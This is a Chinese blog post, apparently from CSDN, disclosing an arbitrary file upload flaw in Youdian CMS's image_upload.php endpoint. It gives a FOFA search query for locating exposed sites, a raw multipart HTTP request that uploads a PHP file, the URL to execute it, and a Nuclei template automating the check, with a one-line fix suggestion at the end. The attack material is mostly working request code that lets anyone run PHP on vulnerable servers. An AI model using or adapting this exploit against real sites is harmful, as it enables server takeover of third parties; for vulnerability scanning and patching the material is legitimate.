友点CMS image_upload.php 文件上传漏洞

文章讲述了友点CMS网站管理系统中image_upload.php接口存在的文件上传漏洞,攻击者可借此上传恶意文件获取服务器权限。提供POC和Nuclei-POC示例,强调了设置接口访问控制和升级到安全版本的重要性。
摘要由CSDN通过智能技术生成

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。

友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。

Ⅱ、fofa语句

app="友点建站-CMS"

Ⅲ、漏洞复现

POC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

------WebKitFormBoundarydAPjrmyKewWuf59H
Content-Disposition: form-data; name="files"; filename="ceshi.php"
Content-Type: image/jpg
 
<?php echo md5('666');unlink(__FILE__);?>
------WebKitFormBoundarydAPjrmyKewWuf59H--

1、构建poc

2、访问

http://127.0.0.1/Public/image/uploads/1708478710775.php

 

Ⅳ、Nuclei-POC

id: Youdian-CMS-uploadfile

info:
  name: 友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="友点建站-CMS"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0

        ------WebKitFormBoundarydAPjrmyKewWuf59H
        Content-Disposition: form-data; name="files"; filename="{{filename}}.php"
        Content-Type: image/jpg
        
        <?php echo md5('666');unlink(__FILE__);?>
        ------WebKitFormBoundarydAPjrmyKewWuf59H--

      - |
        GET /Public/image/uploads/{{path}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
           - 'image/uploads/(\w*)\.php'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

Ⅴ、修复建议

设置接口访问控制,升级至安全版本

  • 29
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值